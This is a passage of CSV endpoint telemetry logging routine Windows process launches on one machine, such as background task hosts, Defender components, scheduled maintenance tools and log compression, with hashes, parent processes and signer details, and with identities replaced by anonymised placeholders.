00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,469412852,469412852,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.59,msedge_exe,msedge.exe,Microsoft Edge
+1057,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:40:41.333732700+00:00,9220,backgroundTaskHost.exe,"""backgroundTaskHost.exe"" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:40:41.373960400+00:00,2021-06-25 00:41:46.354828100+00:00,66367b14-a3ab-47bb-89e3-37f2e7a81bc8,computerpii_0a470890c60768167990033d701e7bd881398861,181481,False,10.7740.19041.1052,False,11540474045136908,,11540474045178304,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+1058,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:40:41.334812800+00:00,9888,backgroundTaskHost.exe,"""backgroundTaskHost.exe"" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:40:41.374076900+00:00,2021-06-25 00:41:46.354868600+00:00,6939c97e-69cf-49f2-8896-94720249311c,computerpii_0a470890c60768167990033d701e7bd881398861,181482,False,10.7740.19041.1052,False,11540474045136908,,11540474045178305,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+1059,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 00:40:41.353344700+00:00,17508,backgroundTaskHost.exe,"""backgroundTaskHost.exe"" -ServerName:App.AppXe9cvj1thv1hmcw0cs98xm3r97tyzy2xs.mca",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 00:40:41.375372700+00:00,2021-06-25 00:41:46.354951+00:00,7ab6d0ff-10d2-4627-89f7-cf9527eb6511,computerpii_0a470890c60768167990033d701e7bd881398861,181484,True,10.7740.19041.1052,False,11540474045136908,,11540474045178307,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,Background Task Host,backgroundTaskHost.exe,Background Task Host
+1060,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:03.666505900+00:00,14148,SenseCncProxy.exe,932,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:04.652699700+00:00,2021-06-24 01:03:58.373833100+00:00,1f0ffd0a-383b-415d-b256-a32e492fe6b7,computerpii_0a470890c60768167990033d701e7bd881398861,169840,False,10.7740.19041.1052,False,11540474045137006,,11540474045175429,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1061,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:08.681327300+00:00,3116,provtool.exe,ProvTool.exe /turn 5 /source LogonIdleTask,PortableExecutable,2021-03-11 01:06:21.750922900+00:00,C:\Windows\System32\provtool.exe,87040,380b6aa8de133a523f008e1c78ebada0,e0d2c66cc92a80c77ab29a56641505036130a8b01bcbafb866e28729f4985e4a,ead6ab9f677d771d426a17c58c95a5ca7e7d69fc,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:08.716792600+00:00,2021-06-24 01:03:58.373998600+00:00,34dcac10-c189-4f6b-b553-cf2ae83fe54d,computerpii_0a470890c60768167990033d701e7bd881398861,169842,False,10.7740.19041.1052,False,11540474045136925,,11540474045175430,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,provtool,provtool,Provisioning package runtime processing tool
+1062,False,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:08.691989500+00:00,396,SpeechModelDownload.exe,SpeechModelDownload.exe,PortableExecutable,2021-06-09 01:20:44.420411100+00:00,C:\Windows\System32\Speech_OneCore\common\SpeechModelDownload.exe,182272,3c5dad72201e770a089ac64486f03d2b,dec41328d36106ba78dbbb59875fb3566091428c0deb98d381d8e08b26a1679d,6df800badccdba5b34d5273c2ecda6d694eaf4de,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:08.719003100+00:00,2021-06-24 01:03:58.374084800+00:00,c26ccf9d-1a0d-4fe4-9bc5-4f49f0647fc1,computerpii_0a470890c60768167990033d701e7bd881398861,169843,False,10.7740.19041.1052,False,11540474045136925,,11540474045175431,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,Speech Model Download Executable,SpeechModelDownload.exe,Speech Model Download Executable
+1063,False,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.731000800+00:00,368,sc.exe,sc.exe start w32time task_started,PortableExecutable,2019-12-07 09:09:34.006180900+00:00,C:\Windows\System32\sc.exe,72192,3fb5cf71f7e7eb49790cb0e663434d80,41f067c3a11b02fe39947f9eba68ae5c7cb5bd1872a6009a4cd1506554a9aba9,b4979a9f970029889713d756c3f123643dde73da,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.768494200+00:00,2021-06-24 01:03:58.375070300+00:00,91d252d0-37b7-4744-acb9-8cdb2b4277c2,computerpii_0a470890c60768167990033d701e7bd881398861,169854,False,10.7740.19041.1052,False,11540474045136925,,11540474045175437,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,sc.exe,sc.exe,Service Control Manager Configuration Tool
+1064,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.738787100+00:00,2352,rundll32.exe,"rundll32.exe C:\Windows\system32\Windows.StateRepositoryClient.dll,StateRepositoryDoMaintenanceTasks",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.771658500+00:00,2021-06-24 01:03:58.375313900+00:00,8e75fdcc-e803-489d-bbb9-e241c6f0e247,computerpii_0a470890c60768167990033d701e7bd881398861,169855,False,10.7740.19041.1052,False,11540474045136925,,11540474045175438,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+1065,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.746054600+00:00,11016,CompatTelRunner.exe,compattelrunner.exe -maintenance,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.775772400+00:00,2021-06-24 01:03:58.375418400+00:00,185c1925-7724-4ab1-806d-83c6770bea71,computerpii_0a470890c60768167990033d701e7bd881398861,169856,False,10.7740.19041.1052,False,11540474045136925,,11540474045175439,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+1066,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.747446500+00:00,15224,makecab.exe,"""makecab.exe"" C:\Windows\Logs\CBS\FilePII_7c4e9c7dd9aa59f578618c021eff7e8040de941f.log C:\Windows\Logs\CBS\CbsPersist_20210620032139.cab",PortableExecutable,2019-12-07 09:08:46.175635700+00:00,C:\Windows\System32\makecab.exe,86528,ff47e32b1b45d1de2ecc39107b365563,ba31ad8eca19c5fe03f6a5c64c8e0adfc7bd8d04b1f4e1c11d167467fd5261e9,a8b93562abc7f0d7252ee9a01e335a3fcecdd30b,7d0c2a24dca67dde6d573e23871f5f0b,18a56c58b18030c70492189d7de2d1813e363b1fb6c59756b4e81e1071492a0e,2bc1a72ad7abb1b0008d961b8278f02289a41028,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:25.737133100+00:00,11908,TiWorker.exe,TiWorker.exe -Embedding,True,2021-06-10 00:46:10.653932100+00:00,504,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.792203400+00:00,2021-06-24 01:03:58.375606100+00:00,daade2fd-0069-455f-9bcc-f8aef55ceafb,computerpii_0a470890c60768167990033d701e7bd881398861,169858,False,10.7740.19041.1052,False,11540474045175324,,11540474045175440,2021-06-24 00:54:25.737133100+00:00,11908,2021-06-24 00:54:25.737133100+00:00,\Device\HarddiskVolume3\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb\TiWorker.exe,11908,128,ActiveProcessStartkey,C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1022_none_7e372e9e7c6ecccb,239432,2026-12-16 19:42:14+00:00,2021-05-11 05:04:17.383161500+00:00,2021-06-24 00:54:25.771043700+00:00,2021-06-09 01:15:48.791212900+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1022,TiWorker.exe,TiWorker.exe,Windows Modules Installer Worker,Microsoft Corporation,Microsoft® Windows® Operating System,5.00,makecab.exe,makecab.exe,Microsoft® Cabinet Maker
+1067,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.751902100+00:00,6380,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 01:02:09.746054600+00:00,11016,CompatTelRunner.exe,compattelrunner.exe -maintenance,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.792486400+00:00,2021-06-24 01:03:58.375683800+00:00,1a42f4a6-f790-45e4-b5de-e390154517ce,computerpii_0a470890c60768167990033d701e7bd881398861,169859,False,10.7740.19041.1052,False,11540474045175439,,11540474045175441,2021-06-24 01:02:09.746054600+00:00,11016,2021-06-24 01:02:09.746054600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,11016,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1068,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 01:02:09.753459900+00:00,18428,dmclient.exe,dmclient.exe,PortableExecutable,2021-02-17 04:34:43.547067+00:00,C:\Windows\System32\dmclient.exe,121344,fd408cadc0abf7d23d62fb913ba5f02e,3d97cab2179c3ab9c975808a12c97a9a06d672b180ae04880ddffe69925aaeff,0dbc874851094dd496e0a2df6226b6b0b5f1ac95,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.801705700+00:00,2021-06-24 01:03:58.375761100+00:00,9b64e081-c171-44a5-8c78-30a692702154,computerpii_0a470890c60768167990033d701e7bd881398861,169860,False,10.7740.19041.1052,False,11540474045136925,,11540474045175442,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,18560,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,dmclient.exe,dmclient.exe,Microsoft Feedback SIUF Deployment Manager Client
+1069,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 01:02:09.769957400+00:00,15132,AppHostRegistrationVerifier.exe,AppHostRegistrationVerifier.exe,PortableExecutable,2021-02-17 04:34:48.145514500+00:00,C:\Windows\System32\AppHostRegistrationVerifier.exe,120320,9709fb202693dbec05127519ee4b65a9,69c0d08149aee10f9a6ee68d19143e2ce80047ab9e07fbda5b2bf964e06a03ce,40fc8c8639937e3501b63f1bb4b8b094a16f46d2,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 01:02:09.812170500+00:00,2021-06-24 01:03:58.375840300+00:00,06008c78-89f8-4e15-b9b0-26afcf3d20c5,computerpii_0a470890c60768167990033d701e7bd881398861,169861,False,10.7740.19041.1052,False,11540474045136925,,11540474045175445,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 